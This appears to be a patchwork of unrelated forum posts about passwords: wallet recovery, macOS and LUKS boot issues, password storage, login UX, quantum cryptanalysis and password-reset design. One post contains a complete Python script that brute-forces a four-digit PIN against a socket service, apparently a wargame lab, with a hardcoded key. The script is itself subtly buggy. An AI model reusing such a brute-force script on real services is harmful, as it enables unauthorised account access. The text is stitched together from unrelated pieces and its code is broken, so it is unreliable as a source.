I have what appears to be a GUID and a password. But no recollection what service I used of if I even purchased / transferred or made a transaction with them back in 2017. Any way to check to see if I have anything in here and retrieve it? My current BTC is on a platform I use regularly, this was prior to me setting up my current process last year… Any advice?
My program brute-forces a password. The password is a string composed of a key and a four digit numeric code. The key is known so we are basically brute-forcing between 0000 through to 9999
An example password is:
I updated that script I wrote to take advantage of multiprocessing in order to run faster.
The basic idea is to divide the task by the number of CPUs available.
There are two Events set up:
prnt_sig_foundis used by subprocesses to tell the parent if they succeed in guessing the right password.
- The parent process then uses
child_sig_termto halt each subprocesses
My Python’s rusty and I think I made some bad choices. It would be useful to have my assumptions invalidated. 🙂
#!/usr/bin/env python # coding: utf-8 import multiprocessing as mp import socket import time import math import sys import os class Connection: def __init__(self, pin = 0, max_iter = 10000, sock = None): print('initizializing socket instance ...') self.pin = pin self.max_iter = max_iter self.password = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ' self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def p_name(self): return mp.current_process().name def connect(self, host='127.0.0.1', port=30002): print(self.p_name(), 'connecting ...', host, port) self.sock.connect((host, port)) print(self.p_name(), 'connection successful.') def write(self, msg): print(self.p_name(), 'sending', msg) self.sock.sendall(msg) def read(self): print(self.p_name(), 'reading data ...') data = self.sock.recv(4096) return data def close(self): try: self.sock.shutdown(0) self.sock.close() except: pass def execute(self, child_sig_term, prnt_sig_found): start_time = time.time() print(self.p_name(), 'executing ...') self.connect() self.write('greetings !') welcome_str = self.read() print(welcome_str) while self.pin < self.max_iter: if child_sig_term.is_set(): break pin_str = str(self.pin).zfill(4) message = self.password + " " + pin_str + "n" # add newline char to flush message or it doesn't get sent self.write(message.encode()) received_msg = self.read() if 'Wrong' in received_msg: print(self.p_name(), 'Wrong guess %s', pin_str) else: print('_________________found_____________', received_msg) prnt_sig_found.set() break self.pin += 1 time.sleep(0.5) end_time = time.time() total_time = end_time - start_time print(self.p_name(), "start: "+str(self.pin), ' end: '+str(self.max_iter), 'total_time: ', str((total_time)/60) + ' minutes') def main(): print('main') connections = () processes = () # requires read/write access to /dev/shm prnt_sig_found = mp.Event() child_sig_term = mp.Event() MAX_ITER_COUNT = 10000 processor_count = mp.cpu_count() step_count = int(math.floor(MAX_ITER_COUNT / processor_count)) # math.floor returns a float in python 2 end = step_count start = 0 print('Initial values ->', processor_count, step_count, start, end) try: for i in range(processor_count): conn = Connection(pin = start, max_iter = end) proc_name = 'BF( ' + str(start) + ' - ' + str(end) + ' )' process = mp.Process(name=proc_name, target=conn.execute, args=(child_sig_term, prnt_sig_found)) process.daemon = True connections.append(conn) processes.append(process) start = end + 1 end += start + step_count # ensure start and end don't exceed max if MAX_ITER_COUNT < end : end = MAX_ITER_COUNT if MAX_ITER_COUNT < start: start = MAX_ITER_COUNT # start all processes for process in processes: process.start() # wait for all processes to finish # block the main program until these processes are finished for process in processes: process.join() prnt_sig_found.wait() child_sig_term.set() except: pass finally: for conn in connections: conn.close() for process in processes: if process.is_alive(): process.terminate() if __name__ == '__main__': main()
I just found out that an e-commerce platform (similar to Shopify) I was planning on using allows me to see my password. I know I can’t assume anything and I should (probably) just run away from it, but it got me curious: is there a way to do it securely?
I mean, what if they use the password’s hash as an encryption key to encrypt the password itself? If done properly, could something like this be a reasonable solution?
Moreover, does anyone have any idea why on earth an e-commerce platform would choose to do it?
And no, I don’t plan to implement anything like this.
There are existing users who login with their email or social accounts. How will existing users login if we get rid of social and email login?
I need to show a message to the user if the user tries to create an account and that email address already is taken and if that email address belongs to the user then reset the password for the account associated with that email address.
There might be some case this could happen.
- User creates an account before and forgot that
- Someone has uses there an email address to create an account
The Reset Password Failed Error failed from the perspective of an alternate Admin User. I also tried it from Recovery Mode where the user didn’t appear. In Single User Mode using the ls command, the user does appear. When attempting the reset from Single User Mode after using mount -uw / then launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist then passwd username, it offers the reset, but when attempting, it gives the error that the password is too short when it clearly isn’t too short. How can I recover this user? I’ve also reset user permissions to no avail.
I have a (supposed to be) headless server running Ubuntu 18.04 where the boot volume is LUKS encrypted. I am unable to redirect the initial boot process to the serial console (running Putty from a Windows 10 PC) so that I can enter the password. At this point the only option I have to leave the enclosure open with a video card and usb keyboard installed so I can enter the password–not a workable option.
The serial console port (from the W10 PC) sees the initial GRUB menu up to the “Press ESC for options”, but nothing until I enter the password. After I enter the password, the remainder of the boot process output appears on the serial console port and I can login. Initially I couldn’t even get the output after the password and the console login to work. To get that far I did the following:
- Edit /etc/default/grub file so that GRUB_CMDLINE_LINUX reads “console=tty1 console=ttyS5,115200”
- Update GRUB with sudo update-grub
- sudo systemctl start getty@ttyS5
- sudo systemctl enable getty@ttyS5
I need to get the entire boot sequence, including prompt for LUKS password redirected to the serial console port. I’ve tried so many different procedures I can’t possibly put them all down, including a half dozen from this site. Someone please help, I need to be able to seal up the enclosure, with the video card and USB keyboard removed and all interaction with the boot process managed from the serial console port.
Many thanksto the Ubuntu Community in advance
actually I think if you try to login and use a wrong password, there could be a link appearing like “forgot password?”
This would send you a new one via email. Since you do not need more information apart from the email/login that should work just fine.
I would however agree with the other posts, that there should not be a button on the login form but just a link, which directs you to a form which asks you for your email/username.
Due to Charles Boyungs comment I did rethink my statement and came to the conclusion, that his criticism is actually well put. I do still think though, that it is not a bad idea to give the possibility to register in the login form.
This is, because often the user is asked to login while trying to access a certain page, if the user has no account, here is the place to have him sign up.
It could work like this.
The form („Login Form“ for the screen reader) has a field for email & password to login and the default action on hitting enter is to login.
There is however a button register. Clicked the user is redirected to a different form with all necessary informations (if there are more needed apart from email & password). If the user did fill in the email and password, it gets passed to the other form.
In case you do not need more information, clicking on register would either present you with a success page if you filled in your information already or if you did not, with a form to fill in the information and just one button „register“.
This way you do have 3 forms, but you can combine them so that it is, in my opinion easy for the user and very convenient.
I’ve read/watched a lot about Quantum Computers, trying to really get into the physics of it. Seems like the topic is poorly explained. I do understand that it takes a lot of qbits to beat modern encryption, so there’s no concern for a while longer.
So while I do see lots of articles/videos claiming Shor’s algorithm will defeat encryption, nothing has explained how the key is captured, and/or how the hashing/salting of the key is undone such that the algorithm has a proper number to work with. Seems like those are pretty big hurdles to overcome regardless of the algorithm.
This probably wouldn’t be a great idea.
It would be easier to hack
If you did this at the start/middle/end of the word, it would take barely any time to brute-force the account. Basically, that means that the hacker could systematically use dictionary words until they found the correct one.
It’s hard to implement
Also, your login form should be focused and simple and neat, and shouldn’t have all sorts of weird features like this.
Users probably won’t like it
Users are used to forgetting passwords, and they might be a bit confused/shocked/angry/scared if, on the forgot password page, it said the first letters of their password in large letters.
Users are also used to getting reset emails and immediately going to their inbox after pressing the reset button. If they were just faced with two letters and still couldn’t know what it was, then they wouldn’t be able to get in.
Let’s look at this from a user’s point of view.
- You setup an account
- You want it to be very secure (of course)
- You’ve forgotten your password
- You can’t remember it at all
- You do a password reset
- It then shows you the first and last letter of your password in large pink and purple letters
- You can remember your password now! Hurrah!
Now, let’s look at this from a hacker’s point of view.
- You find out about this website
- You see that the password reset shows you the first and last letter of your password in large pink and purple letters
- You then put the user’s account username into the password reset
- Then, the letters are revealed
- You then get a robot to try out all the dictionary words starting with those letters
- You have then got access to the user’s login details.
Now then, this would not be good. No it wouldn’t.